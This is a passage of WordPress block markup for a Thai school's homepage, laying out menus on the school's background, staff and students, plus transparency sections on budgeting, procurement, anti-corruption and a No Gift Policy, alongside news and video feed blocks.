6/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder\\u0026p=328\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_5a5d38-a9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_5a5d38-a9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}]} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"author\":[],\"offset\":\"0\",\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#2d27a1\",\"headingHoverBgColor\":\"#abb8c3\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#0693e3\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#8ed1fc\",\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>โครงสร้าง</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=337\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 